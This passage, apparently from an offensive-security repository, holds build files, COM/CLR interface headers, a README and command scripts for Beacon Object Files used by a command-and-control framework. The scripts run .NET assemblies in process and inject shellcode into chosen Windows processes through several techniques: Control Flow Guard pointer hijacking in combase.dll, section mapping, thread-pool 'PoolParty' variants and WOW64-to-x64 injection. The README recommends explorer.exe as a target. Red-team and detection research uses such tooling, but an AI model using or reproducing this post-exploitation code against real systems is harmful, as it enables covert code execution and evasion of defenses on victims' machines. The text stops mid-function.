    DUMMY_METHOD(GetMethods_2);
    DUMMY_METHOD(GetField_2);
    DUMMY_METHOD(GetFields_2);
    DUMMY_METHOD(GetInterface_2);
    DUMMY_METHOD(GetEvent_2);
    DUMMY_METHOD(GetProperty_3);
    DUMMY_METHOD(GetProperty_4);
    DUMMY_METHOD(GetProperty_5);
    DUMMY_METHOD(GetProperty_6);
    DUMMY_METHOD(GetProperty_7);
    DUMMY_METHOD(GetProperties_2);
    DUMMY_METHOD(GetNestedTypes_2);
    DUMMY_METHOD(GetNestedType_2);
    DUMMY_METHOD(GetMember_3);
    DUMMY_METHOD(GetMembers_2);
    DUMMY_METHOD(Attributes);
    DUMMY_METHOD(IsNotPublic);
    DUMMY_METHOD(IsPublic);
    DUMMY_METHOD(IsNestedPublic);
    DUMMY_METHOD(IsNestedPrivate);
    DUMMY_METHOD(IsNestedFamily);
    DUMMY_METHOD(IsNestedAssembly);
    DUMMY_METHOD(IsNestedFamANDAssem);
    DUMMY_METHOD(IsNestedFamORAssem);
    DUMMY_METHOD(IsAutoLayout);
    DUMMY_METHOD(IsLayoutSequential);
    DUMMY_METHOD(IsExplicitLayout);
    DUMMY_METHOD(IsClass);
    DUMMY_METHOD(IsInterface);
    DUMMY_METHOD(IsValueType);
    DUMMY_METHOD(IsAbstract);
    DUMMY_METHOD(IsSealed);
    DUMMY_METHOD(IsEnum);
    DUMMY_METHOD(IsSpecialName);
    DUMMY_METHOD(IsImport);
    DUMMY_METHOD(IsSerializable);
    DUMMY_METHOD(IsAnsiClass);
    DUMMY_METHOD(IsUnicodeClass);
    DUMMY_METHOD(IsAutoClass);
    DUMMY_METHOD(IsArray);
    DUMMY_METHOD(IsByRef);
    DUMMY_METHOD(IsPointer);
    DUMMY_METHOD(IsPrimitive);
    DUMMY_METHOD(IsCOMObject);
    DUMMY_METHOD(HasElementType);
    DUMMY_METHOD(IsContextful);
    DUMMY_METHOD(IsMarshalByRef);
    DUMMY_METHOD(Equals_2);

    END_INTERFACE
} TypeVtbl;

typedef struct ICLRRuntimeInfoVtbl
{
    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE* QueryInterface)(
            ICLRRuntimeInfo* This,
            /* [in] */ REFIID riid,
            /* [iid_is][out] */
            __RPC__deref_out  void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        ICLRRuntimeInfo* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        ICLRRuntimeInfo* This);

    HRESULT(STDMETHODCALLTYPE* GetVersionString)(
        ICLRRuntimeInfo* This,
        /* [size_is][out] */
        SAL__out_ecount_full_opt(*pcchBuffer)  LPWSTR pwzBuffer,
        /* [out][in] */ DWORD* pcchBuffer);

    HRESULT(STDMETHODCALLTYPE* GetRuntimeDirectory)(
        ICLRRuntimeInfo* This,
        /* [size_is][out] */
        __out_ecount_full(*pcchBuffer)  LPWSTR pwzBuffer,
        /* [out][in] */ DWORD* pcchBuffer);

    HRESULT(STDMETHODCALLTYPE* IsLoaded)(
        ICLRRuntimeInfo* This,
        /* [in] */ HANDLE hndProcess,
        /* [retval][out] */ BOOL* pbLoaded);

    HRESULT(STDMETHODCALLTYPE* LoadErrorString)(
        ICLRRuntimeInfo* This,
        /* [in] */ UINT iResourceID,
        /* [size_is][out] */
        __out_ecount_full(*pcchBuffer)  LPWSTR pwzBuffer,
        /* [out][in] */ DWORD* pcchBuffer,
        /* [lcid][in] */ LONG iLocaleID);

    HRESULT(STDMETHODCALLTYPE* LoadLibrary)(
        ICLRRuntimeInfo* This,
        /* [in] */ LPCWSTR pwzDllName,
        /* [retval][out] */ HMODULE* phndModule);

    HRESULT(STDMETHODCALLTYPE* GetProcAddress)(
        ICLRRuntimeInfo* This,
        /* [in] */ LPCSTR pszProcName,
        /* [retval][out] */ LPVOID* ppProc);

    HRESULT(STDMETHODCALLTYPE* GetInterface)(
        ICLRRuntimeInfo* This,
        /* [in] */ REFCLSID rclsid,
        /* [in] */ REFIID riid,
        /* [retval][iid_is][out] */ LPVOID* ppUnk);

    HRESULT(STDMETHODCALLTYPE* IsLoadable)(
        ICLRRuntimeInfo* This,
        /* [retval][out] */ BOOL* pbLoadable);

    HRESULT(STDMETHODCALLTYPE* SetDefaultStartupFlags)(
        ICLRRuntimeInfo* This,
        /* [in] */ DWORD dwStartupFlags,
        /* [in] */ LPCWSTR pwzHostConfigFile);

    HRESULT(STDMETHODCALLTYPE* GetDefaultStartupFlags)(
        ICLRRuntimeInfo* This,
        /* [out] */ DWORD* pdwStartupFlags,
        /* [size_is][out] */
        SAL__out_ecount_full_opt(*pcchHostConfigFile)  LPWSTR pwzHostConfigFile,
        /* [out][in] */ DWORD* pcchHostConfigFile);

    HRESULT(STDMETHODCALLTYPE* BindAsLegacyV2Runtime)(
        ICLRRuntimeInfo* This);

    HRESULT(STDMETHODCALLTYPE* IsStarted)(
        ICLRRuntimeInfo* This,
        /* [out] */ BOOL* pbStarted,
        /* [out] */ DWORD* pdwStartupFlags);

    END_INTERFACE
} ICLRRuntimeInfoVtbl;

typedef struct _ICLRRuntimeInfo {
    ICLRRuntimeInfoVtbl* lpVtbl;
} ICLRRuntimeInfo;

typedef struct _Type {
    TypeVtbl* lpVtbl;
} Type;

typedef struct ICLRMetaHostVtbl
{
    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE* QueryInterface)(
            ICLRMetaHost* This,
            /* [in] */ REFIID riid,
            /* [iid_is][out] */
            __RPC__deref_out  void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        ICLRMetaHost* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        ICLRMetaHost* This);

    HRESULT(STDMETHODCALLTYPE* GetRuntime)(
        ICLRMetaHost* This,
        /* [in] */ LPCWSTR pwzVersion,
        /* [in] */ REFIID riid,
        /* [retval][iid_is][out] */ LPVOID* ppRuntime);

    HRESULT(STDMETHODCALLTYPE* GetVersionFromFile)(
        ICLRMetaHost* This,
        /* [in] */ LPCWSTR pwzFilePath,
        /* [size_is][out] */
        __out_ecount_full(*pcchBuffer)  LPWSTR pwzBuffer,
        /* [out][in] */ DWORD* pcchBuffer);

    HRESULT(STDMETHODCALLTYPE* EnumerateInstalledRuntimes)(
        ICLRMetaHost* This,
        /* [retval][out] */ IEnumUnknown** ppEnumerator);

    HRESULT(STDMETHODCALLTYPE* EnumerateLoadedRuntimes)(
        ICLRMetaHost* This,
        /* [in] */ HANDLE hndProcess,
        /* [retval][out] */ IEnumUnknown** ppEnumerator);

    HRESULT(STDMETHODCALLTYPE* RequestRuntimeLoadedNotification)(
        ICLRMetaHost* This,
        /* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction);

    HRESULT(STDMETHODCALLTYPE* QueryLegacyV2RuntimeBinding)(
        ICLRMetaHost* This,
        /* [in] */ REFIID riid,
        /* [retval][iid_is][out] */ LPVOID* ppUnk);

    HRESULT(STDMETHODCALLTYPE* ExitProcess)(
        ICLRMetaHost* This,
        /* [in] */ INT32 iExitCode);

    END_INTERFACE
} ICLRMetaHostVtbl;

typedef struct _ICLRMetaHost
{
    ICLRMetaHostVtbl* lpVtbl;
} ICLRMetaHost;

typedef struct ICorRuntimeHostVtbl
{
    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE* QueryInterface)(
            ICorRuntimeHost* This,
            /* [in] */ REFIID riid,
            /* [iid_is][out] */
            __RPC__deref_out  void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        ICorRuntimeHost* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        ICorRuntimeHost* This);

    HRESULT(STDMETHODCALLTYPE* CreateLogicalThreadState)(
        ICorRuntimeHost* This);

    HRESULT(STDMETHODCALLTYPE* DeleteLogicalThreadState)(
        ICorRuntimeHost* This);

    HRESULT(STDMETHODCALLTYPE* SwitchInLogicalThreadState)(
        ICorRuntimeHost* This,
        /* [in] */ DWORD* pFiberCookie);

    HRESULT(STDMETHODCALLTYPE* SwitchOutLogicalThreadState)(
        ICorRuntimeHost* This,
        /* [out] */ DWORD** pFiberCookie);

    HRESULT(STDMETHODCALLTYPE* LocksHeldByLogicalThread)(
        ICorRuntimeHost* This,
        /* [out] */ DWORD* pCount);

    HRESULT(STDMETHODCALLTYPE* MapFile)(
        ICorRuntimeHost* This,
        /* [in] */ HANDLE hFile,
        /* [out] */ HMODULE* hMapAddress);

    HRESULT(STDMETHODCALLTYPE* GetConfiguration)(
        ICorRuntimeHost* This,
        /* [out] */ ICorConfiguration* *pConfiguration);

    HRESULT(STDMETHODCALLTYPE* Start)(
        ICorRuntimeHost* This);

    HRESULT(STDMETHODCALLTYPE* Stop)(
        ICorRuntimeHost* This);

    HRESULT(STDMETHODCALLTYPE* CreateDomain)(
        ICorRuntimeHost* This,
        /* [in] */ LPCWSTR pwzFriendlyName,
        /* [in] */ IUnknown* pIdentityArray,
        /* [out] */ IUnknown** pAppDomain);

    HRESULT(STDMETHODCALLTYPE* GetDefaultDomain)(
        ICorRuntimeHost* This,
        /* [out] */ IUnknown** pAppDomain);

    HRESULT(STDMETHODCALLTYPE* EnumDomains)(
        ICorRuntimeHost* This,
        /* [out] */ HDOMAINENUM* hEnum);

    HRESULT(STDMETHODCALLTYPE* NextDomain)(
        ICorRuntimeHost* This,
        /* [in] */ HDOMAINENUM hEnum,
        /* [out] */ IUnknown** pAppDomain);

    HRESULT(STDMETHODCALLTYPE* CloseEnum)(
        ICorRuntimeHost* This,
        /* [in] */ HDOMAINENUM hEnum);

    HRESULT(STDMETHODCALLTYPE* CreateDomainEx)(
        ICorRuntimeHost* This,
        /* [in] */ LPCWSTR pwzFriendlyName,
        /* [in] */ IUnknown* pSetup,
        /* [in] */ IUnknown* pEvidence,
        /* [out] */ IUnknown** pAppDomain);

    HRESULT(STDMETHODCALLTYPE* CreateDomainSetup)(
        ICorRuntimeHost* This,
        /* [out] */ IUnknown** pAppDomainSetup);

    HRESULT(STDMETHODCALLTYPE* CreateEvidence)(
        ICorRuntimeHost* This,
        /* [out] */ IUnknown** pEvidence);

    HRESULT(STDMETHODCALLTYPE* UnloadDomain)(
        ICorRuntimeHost* This,
        /* [in] */ IUnknown* pAppDomain);

    HRESULT(STDMETHODCALLTYPE* CurrentDomain)(
        ICorRuntimeHost* This,
        /* [out] */ IUnknown** pAppDomain);

    END_INTERFACE
} ICorRuntimeHostVtbl;

typedef struct _ICorRuntimeHost {
    ICorRuntimeHostVtbl* lpVtbl;
} ICorRuntimeHost;

#undef DUMMY_METHOD
#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IMethodInfo *This)

typedef struct _MethodInfoVtbl {
    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE* QueryInterface)(
            IMethodInfo* This,
            /* [in] */ REFIID riid,
            /* [iid_is][out] */
            __RPC__deref_out  void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        IMethodInfo* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        IMethodInfo* This);

    DUMMY_METHOD(GetTypeInfoCount);
    DUMMY_METHOD(GetTypeInfo);
    DUMMY_METHOD(GetIDsOfNames);
    DUMMY_METHOD(Invoke);

    DUMMY_METHOD(ToString);
    DUMMY_METHOD(Equals);
    DUMMY_METHOD(GetHashCode);
    DUMMY_METHOD(GetType);
    DUMMY_METHOD(MemberType);
    DUMMY_METHOD(name);
    DUMMY_METHOD(DeclaringType);
    DUMMY_METHOD(ReflectedType);
    DUMMY_METHOD(GetCustomAttributes);
    DUMMY_METHOD(GetCustomAttributes_2);
    DUMMY_METHOD(IsDefined);

    HRESULT(STDMETHODCALLTYPE* GetParameters)(
        IMethodInfo* This,
        SAFEARRAY** pRetVal);

    DUMMY_METHOD(GetMethodImplementationFlags);
    DUMMY_METHOD(MethodHandle);
    DUMMY_METHOD(Attributes);
    DUMMY_METHOD(CallingConvention);
    DUMMY_METHOD(Invoke_2);
    DUMMY_METHOD(IsPublic);
    DUMMY_METHOD(IsPrivate);
    DUMMY_METHOD(IsFamily);
    DUMMY_METHOD(IsAssembly);
    DUMMY_METHOD(IsFamilyAndAssembly);
    DUMMY_METHOD(IsFamilyOrAssembly);
    DUMMY_METHOD(IsStatic);
    DUMMY_METHOD(IsFinal);
    DUMMY_METHOD(IsVirtual);
    DUMMY_METHOD(IsHideBySig);
    DUMMY_METHOD(IsAbstract);
    DUMMY_METHOD(IsSpecialName);
    DUMMY_METHOD(IsConstructor);

    HRESULT(STDMETHODCALLTYPE* Invoke_3)(
        IMethodInfo* This,
        VARIANT     obj,
        SAFEARRAY* parameters,
        VARIANT* ret);

    DUMMY_METHOD(returnType);
    DUMMY_METHOD(ReturnTypeCustomAttributes);
    DUMMY_METHOD(GetBaseDefinition);

    END_INTERFACE
} MethodInfoVtbl;

typedef struct _MethodInfo {
    MethodInfoVtbl* lpVtbl;
} MethodInfo;

typedef struct ICorConfigurationVtbl
{
    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE* QueryInterface)(
            ICorConfiguration* This,
            /* [in] */ REFIID riid,
            /* [iid_is][out] */
            __RPC__deref_out  void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        ICorConfiguration* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        ICorConfiguration* This);

    HRESULT(STDMETHODCALLTYPE* SetGCThreadControl)(
        ICorConfiguration* This,
        /* [in] */ IGCThreadControl* pGCThreadControl);

    HRESULT(STDMETHODCALLTYPE* SetGCHostControl)(
        ICorConfiguration* This,
        /* [in] */ IGCHostControl* pGCHostControl);

    HRESULT(STDMETHODCALLTYPE* SetDebuggerThreadControl)(
        ICorConfiguration* This,
        /* [in] */ IDebuggerThreadControl* pDebuggerThreadControl);

    HRESULT(STDMETHODCALLTYPE* AddDebuggerSpecialThread)(
        ICorConfiguration* This,
        /* [in] */ DWORD dwSpecialThreadId);

    END_INTERFACE
} ICorConfigurationVtbl;

typedef struct _ICorConfiguration
{
    ICorConfigurationVtbl* lpVtbl;
}ICorConfiguration;

typedef struct IGCThreadControlVtbl
{
    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE* QueryInterface)(
            IGCThreadControl* This,
            /* [in] */ REFIID riid,
            /* [iid_is][out] */
            __RPC__deref_out  void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        IGCThreadControl* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        IGCThreadControl* This);

    HRESULT(STDMETHODCALLTYPE* ThreadIsBlockingForSuspension)(
        IGCThreadControl* This);

    HRESULT(STDMETHODCALLTYPE* SuspensionStarting)(
        IGCThreadControl* This);

    HRESULT(STDMETHODCALLTYPE* SuspensionEnding)(
        IGCThreadControl* This,
        DWORD Generation);

    END_INTERFACE
} IGCThreadControlVtbl;

typedef struct _IGCThreadControl
{
    IGCThreadControlVtbl* lpVtbl;
}IGCThreadControl;

typedef struct IGCHostControlVtbl
{
    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE* QueryInterface)(
            IGCHostControl* This,
            /* [in] */ REFIID riid,
            /* [iid_is][out] */
            __RPC__deref_out  void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        IGCHostControl* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        IGCHostControl* This);

    HRESULT(STDMETHODCALLTYPE* RequestVirtualMemLimit)(
        IGCHostControl* This,
        /* [in] */ SIZE_T sztMaxVirtualMemMB,
        /* [out][in] */ SIZE_T* psztNewMaxVirtualMemMB);

    END_INTERFACE
} IGCHostControlVtbl;

typedef struct _IGCHostControl
{
    IGCHostControlVtbl* lpVtbl;
} IGCHostControl;

typedef struct IDebuggerThreadControlVtbl
{
    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE* QueryInterface)(
            IDebuggerThreadControl* This,
            /* [in] */ REFIID riid,
            /* [iid_is][out] */
            __RPC__deref_out  void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        IDebuggerThreadControl* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        IDebuggerThreadControl* This);

    HRESULT(STDMETHODCALLTYPE* ThreadIsBlockingForDebugger)(
        IDebuggerThreadControl* This);

    HRESULT(STDMETHODCALLTYPE* ReleaseAllRuntimeThreads)(
        IDebuggerThreadControl* This);

    HRESULT(STDMETHODCALLTYPE* StartBlockingForDebugger)(
        IDebuggerThreadControl* This,
        DWORD dwUnused);

    END_INTERFACE
} IDebuggerThreadControlVtbl;

typedef struct _IDebuggerThreadControl {
    IDebuggerThreadControlVtbl* lpVtbl;
} IDebuggerThreadControl;

================================================
FILE: Execution-BOF/execution.axs
================================================
var metadata = {
    name: "Execution-BOF",
    description: "BOFs for inline execution"
};

ax.script_import(ax.script_dir() + "No-Consolation/no_consolation.axs")



var cmd_execute_assembly = ax.create_command("execute-assembly", "Perform in process .NET assembly execution", "execute-assembly /opt/windows/Seatbelt.exe -group=user");
cmd_execute_assembly.addArgBool("--async", "Use Async BOF");
cmd_execute_assembly.addArgFile("path", true, "Path to .NET assembly");
cmd_execute_assembly.addArgString("params", ".NET assembly parameters", "");
cmd_execute_assembly.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let assembly_content = parsed_json["path"];
    let assembly_params  = parsed_json["params"];
    let async = "";
    if (parsed_json["--async"]) async = "-a ";

    if(assembly_content.length == 0) {
        throw new Error(`file ${parsed_json["path"]} not readed`);
    }

    let bof_params = ax.bof_pack("bytes,cstr", [assembly_content, assembly_params]);
    let bof_path = ax.script_dir() + "_bin/execute-assembly." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof ${async}"${bof_path}" ${bof_params}`, "Task: execute .NET assembly");
});

var group_exec = ax.create_commands_group("Execution-BOF", [cmd_execute_assembly, cmd_no_consolation]);
ax.register_commands_group(group_exec, ["beacon", "gopher", "kharon"], ["windows"], []);


================================================
FILE: Injection-BOF/CMakeLists.txt
================================================
cmake_minimum_required(VERSION 3.16)
#project(Injection-BOF C)

set(CMAKE_C_STANDARD 99)

# Include directories (main _include is at root level)
include_directories(${CMAKE_SOURCE_DIR}/_include)

# Source files
set(INJECT_CFG_SOURCES inject_cfg/inject_cfg.c)
set(INJECT_SEC_SOURCES inject_sec/inject_sec.c)
set(INJECT_POOLPARTY_SOURCES inject_poolparty/inject_poolparty.c)
set(INJECT_32TO64_SOURCES inject_32to64/inject_32to64.c)

# Compiler flags
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Os")
set(CMAKE_C_FLAGS_RELEASE "${CMAKE_C_FLAGS_RELEASE} -s")

# Object file targets
add_library(inject_cfg OBJECT ${INJECT_CFG_SOURCES})
target_compile_options(inject_cfg PRIVATE -masm=intel -Wall)

add_library(inject_sec OBJECT ${INJECT_SEC_SOURCES})
target_compile_options(inject_sec PRIVATE -w -Wno-int-conversion -Wno-incompatible-pointer-types)
target_compile_definitions(inject_sec PRIVATE BOF)

add_library(inject_poolparty OBJECT ${INJECT_POOLPARTY_SOURCES})
target_compile_options(inject_poolparty PRIVATE -w -Wno-int-conversion -Wno-incompatible-pointer-types)
target_compile_definitions(inject_poolparty PRIVATE BOF)

# x86 target
add_library(inject_32to64 OBJECT ${INJECT_32TO64_SOURCES})
target_compile_options(inject_32to64 PRIVATE -w -Wno-int-conversion -Wno-incompatible-pointer-types)
target_compile_definitions(inject_32to64 PRIVATE BOF)

# Create _bin directory
file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/_bin)

# Custom commands to copy object files to _bin
add_custom_target(copy_inject_cfg ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:inject_cfg> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/inject_cfg.x64.o
    DEPENDS inject_cfg
    COMMENT "Copying inject_cfg object file"
)

add_custom_target(copy_inject_sec ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:inject_sec> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/inject_sec.x64.o
    DEPENDS inject_sec
    COMMENT "Copying inject_sec object file"
)

add_custom_target(copy_inject_poolparty ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:inject_poolparty> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/inject_poolparty.x64.o
    DEPENDS inject_poolparty
    COMMENT "Copying inject_poolparty object file"
)

add_custom_target(copy_inject_32to64 ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:inject_32to64> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/inject_32to64.x86.o
    DEPENDS inject_32to64
    COMMENT "Copying inject_32to64 object file"
)


================================================
FILE: Injection-BOF/Makefile
================================================
CC64 = x86_64-w64-mingw32-gcc
CC86 = i686-w64-mingw32-gcc
STRIP64 = x86_64-w64-mingw32-strip --strip-unneeded
STRIP86 = i686-w64-mingw32-strip --strip-unneeded
CFLAGS = -I ../_include -w -Wno-int-conversion -Wno-incompatible-pointer-types -Os -DBOF -c

all: bof

bof: clean
	@(mkdir _bin 2>/dev/null) && echo 'creating _bin directory' || echo '_bin directory exists'
	# 64-bit builds
	@($(CC64) $(CFLAGS) inject_sec/inject_sec.c -o _bin/inject_sec.x64.o && $(STRIP64) _bin/inject_sec.x64.o) && echo '[+] inject_sec' || echo '[!] inject_sec'
	@($(CC64) $(CFLAGS) inject_poolparty/inject_poolparty.c -o _bin/inject_poolparty.x64.o && $(STRIP64) _bin/inject_poolparty.x64.o) && echo '[+] inject_poolparty' || echo '[!] inject_poolparty'
	@($(CC64) -I ../_include -masm=intel -Wall -Os -c inject_cfg/inject_cfg.c -o _bin/inject_cfg.x64.o && $(STRIP64) _bin/inject_cfg.x64.o) && echo '[+] inject_cfg' || echo '[!] inject_cfg'

	# 32-bit builds
	@($(CC86) $(CFLAGS) inject_sec/inject_sec.c         -o _bin/inject_sec.x32.o        && $(STRIP86) _bin/inject_sec.x32.o)        && echo '[+] inject_sec (x32)'        || echo '[!] inject_sec (x32)'
	@#($(CC86) $(CFLAGS) inject_poolparty/inject_poolparty.c -o _bin/inject_poolparty.x32.o && $(STRIP86) _bin/inject_poolparty.x32.o) && echo '[+] inject_poolparty (x32)' || echo '[!] inject_poolparty (x32)'
	@($(CC86) -I ../_include -masm=intel -Wall -Os -c inject_cfg/inject_cfg.c -o _bin/inject_cfg.x32.o && $(STRIP86) _bin/inject_cfg.x32.o) && echo '[+] inject_cfg (x32)' || echo '[!] inject_cfg (x32)'

	@($(CC86) $(CFLAGS) inject_32to64/inject_32to64.c -o _bin/inject_32to64.x86.o && $(STRIP64) _bin/inject_32to64.x86.o) && echo '[+] inject_32to64' || echo '[!] inject_32to64'

clean:
	@(rm -rf _bin)


================================================
FILE: Injection-BOF/README.md
================================================
# Injection-BOF

Beacon Object Files for injects desired shellcode into target process

![](_img/01.png)

The **Inject** item will be added to the context menu in the Process Browser.

![](_img/02.png)

![](_img/03.png)



## inject-cfg

A beacon object file implementation of the process injection proof-of-concept from my blog post [Control Flow Hijacking via Data Pointers](https://www.legacyy.xyz/defenseevasion/windows/2025/04/16/control-flow-hijacking-via-data-pointers.html). Hijacks control flow via overwriting `combase.dll`'s Control Flow Guard function pointers called by COM proxying functions.
- From my testing, `explorer.exe` is the current best candidate in terms of an easy triggering mechanism due to its heavy reliance on COM proxying. Would recommend experimenting.
- **Make sure** shellcode is 64-bit as this BOF only supports 64-bit beacons & target processes.
- This has only been tested on windows versions `Win10 21H2 (19044.5737)` & `Win11 24H2 (26100.3775)`.

```
inject-cfg <pid> <shellcode file>
```



## inject-sec

Injects desired shellcode into target process using section mapping
```
inject-sec <pid> <shellcode file>
```


## inject-poolparty

A collection of process injection techniques abusing Windows Thread Pools. [**The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools**](https://www.blackhat.com/eu-23/briefings/schedule/#the-pool-party-you-will-never-forget-new-process-injection-techniques-using-windows-thread-pools-35446)

| Variant ID  | Varient Description |
| ------------- | ----------------- |
| 1  | Overwrite the start routine of the target worker factory       |
| 2  | Insert TP_WORK work item to the target process's thread pool   |
| 3  | Insert TP_WAIT work item to the target process's thread pool   |
| 4  | Insert TP_IO work item to the target process's thread pool     |
| 5  | Insert TP_ALPC work item to the target process's thread pool   |
| 6  | Insert TP_JOB work item to the target process's thread pool    |
| 7  | Insert TP_DIRECT work item to the target process's thread pool |
| 8  | Insert TP_TIMER work item to the target process's thread pool  |

```
inject-poolparty <technique id> <pid> <shellcode file>
```



## inject-32to64

WOW64 to native x64 process injection. It allows a 32-bit (WOW64) process to inject x64 shellcode into a native 64-bit process by performing a context switch to 64-bit mode.

- Injects x64 shellcode from a WOW64 process into a native 64-bit process
- Performs context switching from 32-bit to 64-bit mode and back
- Uses `RtlCreateUserThread` to create a remote thread in the target process

```
inject-32to64 <pid> <shellcode_file>
```




## Credits
* secinject - https://github.com/apokryptein/secinject
* DataInject-BOF - https://github.com/iilegacyyii/DataInject-BOF
* PoolParty - https://github.com/SafeBreach-Labs/PoolParty
* https://maldevacademy.com/new/modules/64
* https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/migrate/executex64.asm

================================================
FILE: Injection-BOF/inject.axs
================================================
var metadata = {
    name: "Injection-BOF",
    description: "BOFs for process injection"
};

/// COMMANDS

var cmd_inject_cfg = ax.create_command("inject-cfg", "Inject shellcode into a target process and hijack execution via overwriting combase.dll!__guard_check_icall_fptr", "inject-cfg 808 /tmp/shellcode.bin");
cmd_inject_cfg.addArgInt("pid", true);
cmd_inject_cfg.addArgFile("shellcode", true);
cmd_inject_cfg.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let pid = parsed_json["pid"];
    let shellcode_content = parsed_json["shellcode"];

    let bof_params = ax.bof_pack("int,bytes", [pid, shellcode_content]);
    let bof_path = ax.script_dir() + "_bin/inject_cfg." + ax.arch(id) + ".o";
    let message = "Task: Executing DataInject-BOF by @0xLegacyy";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});


var cmd_inject_sec = ax.create_command("inject-sec", "Injects desired shellcode into target process using section mapping", "inject-sec 808 /tmp/shellcode.bin");
cmd_inject_sec.addArgInt("pid", true);
cmd_inject_sec.addArgFile("shellcode", true);
cmd_inject_sec.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let pid = parsed_json["pid"];
    let shellcode_content = parsed_json["shellcode"];

    let bof_params = ax.bof_pack("int,bytes", [pid, shellcode_content]);
    let bof_path = ax.script_dir() + "_bin/inject_sec." + ax.arch(id) + ".o";
    let message = "Task: inject shellcode (section mapping)";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});


var cmd_inject_poolparty = ax.create_command("inject-poolparty", "Injects desired shellcode into target process using specified pool party technique", "inject-poolparty 7 808 /tmp/shellcode.bin");
cmd_inject_poolparty.addArgInt("technique", true, "1 - Overwrite the start routine, 2 - TP_WORK, 3 - Insert TP_WAIT, 4 - TP_IO, 5 - TP_ALPC, 6 - Insert TP_JOB, 7 - TP_DIRECT, 8 - TP_TIMER");
cmd_inject_poolparty.addArgInt("pid", true)
cmd_inject_poolparty.addArgFile("shellcode", true);
cmd_inject_poolparty.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let pid = parsed_json["pid"];
    let shellcode_content = parsed_json["shellcode"];
    let technique = parsed_json["technique"];

    let bof_params = ax.bof_pack("int,bytes,int", [pid, shellcode_content, technique]);
    let bof_path = ax.script_dir() + "_bin/inject_poolparty." + ax.arch(id) + ".o";
    let message = "Task: inject shellcode (pool party " + "technique " + technique +")";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});



var cmd_inject_32to64 = ax.create_command("inject-32to64", "Inject x64 shellcode from WOW64 (32-bit) process into native 64-bit process [requires 32-bit agent]", "inject-32to64 808 /tmp/shellcode.bin");
cmd_inject_32to64.addArgInt("pid", true);
cmd_inject_32to64.addArgFile("shellcode", true);
cmd_inject_32to64.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    if (ax.arch(id) !== "x32") {
        ax.console_message(id, "BOF error", "error", "inject-32to64 only works on 32-bit agents");
        return false;
    }

    let pid = parsed_json["pid"];
    let shellcode_content = parsed_json["shellcode"];

    let bof_params = ax.bof_pack("int,bytes", [pid, shellcode_content]);
    let bof_path = ax.script_dir() + "_bin/inject_32to64.x86.o";
    let message = "Task: inject x64 shellcode (32-bit WOW64 -> native x64)";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});



var group_exec = ax.create_commands_group("Injection-BOF", [cmd_inject_cfg, cmd_inject_sec, cmd_inject_poolparty, cmd_inject_32to64]);
ax.register_commands_group(group_exec, ["beacon", "gopher", "kharon"], ["windows"], []);



/// MENU

let inject_action = menu.create_action("Inject shellcode", function(process_list) {
    let methods = {
        "inject-sec": "Injects desired shellcode into target process using section mapping",
        "inject-cfg": "Inject shellcode into a target process and hijack execution via overwriting combase.dll!__guard_check_icall_fptr",
        "inject-poolparty": "Injects desired shellcode into target process using pool party",
        "inject-32to64": "Inject x64 shellcode from WOW64 (32-bit) process into native 64-bit process [requires 32-bit agent] using RtlCreateUserThread"
    };
    let label_shellcode  = form.create_label("Shellcode file:");
    let text_shellcode   = form.create_textline();
    let button_shellcode = form.create_button("...");

    let label_method = form.create_label("Inject method:");
    let combo_method = form.create_combo();
    combo_method.addItems(["inject-sec", "inject-cfg", "inject-poolparty", "inject-32to64"]);

    let label_poolparty_variant = form.create_label("Inject method:");
    let combo_poolparty_variant = form.create_combo();
    combo_poolparty_variant.addItems(["1", "2", "3", "4", "5", "6", "7"]);
    label_poolparty_variant.setVisible(false);
